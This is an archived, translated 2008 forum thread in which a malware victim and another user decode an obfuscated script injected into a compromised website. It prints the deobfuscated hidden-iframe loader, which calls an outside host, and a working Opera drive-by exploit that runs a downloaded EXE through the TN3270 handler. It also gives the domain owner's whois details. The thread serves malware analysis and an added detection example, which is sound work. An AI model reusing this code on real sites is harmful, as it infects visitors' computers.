Welcome! This is an archived version of the forums at «Хакер.Ru». It runs in read-only mode.
 

Need help decoding a script/exploit

Need help decoding a script/exploit - 2008-01-08 05:18:59.396666
voody

Posts: 958
Rating: 0
Joined: 2005-02-06 22:28:30
To the moderators: I didn't know where best to put this topic, so I decided on this section. Please move it to a more suitable one if you see fit.

Hi everyone. First, a bit of background.

This afternoon an acquaintance of mine sent me an invitation to a group (on VKontakte.ru), and the title of that group contained a website address. Why did I ever go there … and with IE, no less … In short, that is where I picked up the Win32.Grum.D trojan and some other junk that was detected as a spam-sending program (I saved the original exe files; if anyone can give me more detailed information about what they do, I will gladly send them to that person). I have (I hope) removed the trojans, but it was not that simple. My ICQ account was stolen. A six-digit number. Very upsetting. It was a nice one (638-036). On top of that, I had a lot of important contacts there, including work ones. I have no doubt that this happened because of the trojan. So, getting the ICQ account back is almost impossible by now; what I want to do now is try to find out where all this comes from, so to speak, i.e. decode the exploit code and understand what was loaded and from where. At the very least, I will write to the hosting provider and ask them to shut the site down.

Now, down to business.
Site address: http://www.bigbluesrevival.ru/
At the end of the page source you can see these lines:

<!-- dfbf44e3a251fe4281d671f4b6aca0d2 --><script>document.write(unescape("[URL-encoded script]"))</script><!--/-->
A very informative comment on the script, isn't it? :)
After decoding, this is what I got:

<script>
function fe2ngk(oz9skw){
var c6b2th=new String(arguments.callee);
c6b2th=c6b2th.replace(/[^a-z0-9()+_\.,-]+/ig, "").toUpperCase(),n4v2ux=0,tlj2gv=0,nw037y='',dxf47z=0;
for(var lukv4w=0;lukv4w<c6b2th.length;lukv4w++)dxf47z+=c6b2th.charCodeAt(lukv4w,1);
for(n4v2ux=0;n4v2ux<oz9skw.length;n4v2ux++){
var mpm2xz=oz9skw[n4v2ux],y8o1ip=c6b2th.substr(tlj2gv,1).charCodeAt(0)^dxf47z;
nw037y+=String.fromCharCode(mpm2xz^y8o1ip);
tlj2gv++;
if(tlj2gv==c6b2th.length)tlj2gv=0
}
document.write(nw037y);
nw037y=''
}
fe2ngk(new Array(/* the integer array from the encoded script */))
</script>
That is where the decoding ended, because this code produced an error:

var FSO = new ActiveXObject("Scripting.FileSystemObject");
var Out = FSO.CreateTextFile("C:\\Out.txt");
function fe2ngk(oz9skw)
{
    var c6b2th = new String(arguments.callee);
    c6b2th = c6b2th.replace(/[^a-z0-9()+_\.,-]+/ig, "").toUpperCase();
    n4v2ux=0; tlj2gv=0; nw037y=''; dxf47z=0;
    for (var lukv4w=0; lukv4w < c6b2th.length; lukv4w++) dxf47z+=c6b2th.charCodeAt(lukv4w,1);
    for(n4v2ux=0; n4v2ux<oz9skw.length; n4v2ux++)
    {
        var mpm2xz = oz9skw[n4v2ux];
        y8o1ip = c6b2th.substr(tlj2gv,1).charCodeAt(0)^dxf47z;
        nw037y += String.fromCharCode(mpm2xz^y8o1ip);
        tlj2gv++;
        if (tlj2gv == c6b2th.length) tlj2gv = 0;
    }
    Out.Write(nw037y);
    nw037y='';
}
fe2ngk(new Array(/* the integer array from the script above */));
Post #: 1
RE: Need help decoding a script/exploit - 2008-01-08 07:21:38.256666   
Lex_Voodoo

Posts: 7328
Ratings: 0
Joined: 2004-12-07 13:55:12
WebDeveloper -> View generated source:

String.prototype.AfKGewpBj = function() {
	// Helper: returns the string reversed (hides the host and path literals below)
	var t=this, o='';
	for(var i=t.length; i>=0; i--) o+=t.substr(i,1);
	return o;
}
function UVqhMFpSDsB(){}
UVqhMFpSDsB.prototype = {
	host:'nc.4orea.ved'.AfKGewpBj(),
	path:'/nc.gnitsoh-niam/'.AfKGewpBj(),
	cookieName:'davr4',
	cookieValue:1,
	// Writes a 1x1 iframe unless the marker cookie is already set
	install : function() {
		if(!this.alreadyInstalled()) {
			var s = "<iframe width=1 height=1 frameBorder=0 src='" + this.getFrameURL() + "'></iframe>";
			try { document.write(s) }
			catch(e){ document.write("<html><body>" + s + "</body></html>") }
			this.setCookie(this.cookieName, this.cookieValue);
		}
	},
	// Marker cookie expires after 24 hours (86400000 ms)
	setCookie : function(name, value) {
		var d= new Date();
		d.setTime(new Date().getTime() + 86400000);
		document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString();
	},
	alreadyInstalled : function() {
		return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);
	},
	// URL shape: http://<page host>.<16 hex chars>.<host><path>
	getFrameURL : function() {
		var dlh=document.location.host;
		return 'http://' + ((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.') + "." + this.getRandString() + "." + this.host + this.path;
	},
	// 16 random hex characters
	getRandString : function() {
		var l=16, c= '0123456789abcdef', o='';
		for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1);
		return o;
	}
};
var o = new UVqhMFpSDsB();
o.install();
As I understand it, getting the exploit's address from here is no longer a problem.
Post #: 2
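An added example, not part of the original post and not the loader author's code: it recovers the reversed host and path literals from the loader statically (nothing is evaluated) and builds a matcher for the URL shape that getFrameURL() produces, for use on proxy or DNS logs. The names recoverLiterals, frameUrlMatcher and scan, and the log URLs using www.example.test, are constructed for illustration.

```javascript
// Added example: static IoC recovery for the loader above. Nothing is eval'd.
// SAMPLE is an abridged excerpt of the loader posted in the thread.
const SAMPLE = String.raw`String.prototype.AfKGewpBj = function() { /* body omitted */ }
UVqhMFpSDsB.prototype = { host:'nc.4orea.ved'.AfKGewpBj(),
path:'/nc.gnitsoh-niam/'.AfKGewpBj(), cookieName:'davr4', cookieValue:1 }`;

const reverse = (s) => [...s].reverse().join('');
const defang = (s) => s.replace(/\./g, '[.]');

// Find the String.prototype helper, then reverse every literal it is called on.
function recoverLiterals(src) {
  const helper = /String\.prototype\.(\w+)\s*=\s*function/.exec(src);
  if (!helper) return {};
  const call = new RegExp(`(\\w+)\\s*:\\s*'([^']*)'\\.${helper[1]}\\(\\)`, 'g');
  const out = {};
  for (const m of src.matchAll(call)) out[m[1]] = reverse(m[2]);
  return out;
}

// getFrameURL() yields http://<page host>.<16 hex chars>.<host><path>
// (or <16 hex>.<16 hex> when the page host is empty); match that shape.
function frameUrlMatcher({ host, path }) {
  const esc = (s) => s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
  return new RegExp(`^http://[a-z0-9.-]+\\.[0-9a-f]{16}\\.${esc(host)}${esc(path)}`, 'i');
}

// Returns the defanged host, the path, and the log URLs that match the shape.
function scan(urls, src = SAMPLE) {
  const ioc = recoverLiterals(src);
  if (!ioc.host || !ioc.path) return { host: null, path: null, hits: [] };
  const re = frameUrlMatcher(ioc);
  return { host: defang(ioc.host), path: ioc.path, hits: urls.filter((u) => re.test(u)) };
}

// Constructed proxy-log URLs (not captured traffic), built from the recovered values.
const c2 = recoverLiterals(SAMPLE);
const LOG = [
  `http://www.example.test.0123456789abcdef.${c2.host}${c2.path}`,
  `http://fedcba9876543210.0123456789abcdef.${c2.host}${c2.path}`, // empty page host case
  `http://www.example.test/index.html`,                            // unrelated request
  `http://www.example.test.0123456789abcde.${c2.host}${c2.path}`,  // 15 hex chars: no match
];
console.log(scan(LOG));
```

Because the random label changes on every page load, matching on the fixed suffix plus the 16-hex label is more useful than blocking any single full hostname.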
RE: Need help decoding a script/exploit - 2008-01-08 07:50:44.563333   
Lex_Voodoo

Posts: 7328
Ratings: 0
Joined: 2004-12-07 13:55:12
And here, in fact, is the iframe itself:
http://d e v . a e r o 4 . c n/a d p a c k/index.php

<script language="JavaScript">
blank_iframe = document.createElement('iframe');
blank_iframe.src = 'about:blank';
blank_iframe.setAttribute('id', 'blank_iframe_window');
blank_iframe.setAttribute('style', 'display:none');
document.appendChild(blank_iframe);
blank_iframe_window.eval ("config_iframe = document.createElement('iframe');\
config_iframe.setAttribute('id', 'config_iframe_window');\
config_iframe.src = 'opera:config';\
document.appendChild(config_iframe);\
app_iframe = document.createElement('script');\
cache_iframe = document.createElement('iframe');\
app_iframe.src = '<?php echo $url; ?>';\
app_iframe.onload = function ()\
{\
cache_iframe.src = 'opera:cache';\
cache_iframe.onload = function ()\
{\
cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
var re = new RegExp('(OPR\\w{5}.EXE)</TD>\\s*<TD>\\d+</TD>\\s*<TD><A HREF=\"'+app_iframe.src.toUpperCase(), '');\
filename = cache.match(re);\
config_iframe_window.eval\
(\"\
opera.setPreference('Network','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename[1]);\
app_link = document.createElement('a');\
app_link.setAttribute('href', 'tn3270://nothing');\
app_link.click();\
setTimeout(function () {opera.setPreference('Network','TN3270 App','telnet.exe')},1000);\
\");\
};\
document.appendChild(cache_iframe);\
};\
document.appendChild(app_iframe);");
</script>
The site owner's details; by the way, note that the e-mail is on mail.ru :)
quote:

Domain Name: a e r o 4.cn
ROID: 20071103s10001s03230020-cn
Domain Status: ok
Registrant Organization: 0
Registrant Name: MeroshnechenkoRimur
Administrative Email: t e m . d o m e n @mail.ru
Sponsoring Registrar: 厦门华商盛世网络有限公司
Name Server:ns1.everydns.net
Name Server:ns2.everydns.net
Registration Date: 2007-11-03 10:19
Expiration Date: 2008-11-03 10:19


The server is located in Tallinn (Estonia); the hosting looks like an ordinary public one, web.compic.ee, the admin's e-mail is roman@compic.ee

P.S. Yes, the main page of a e r o 4.cn is a decoy for suckers: a fake message saying that the site has been blocked. In reality it has not.
Post #: 3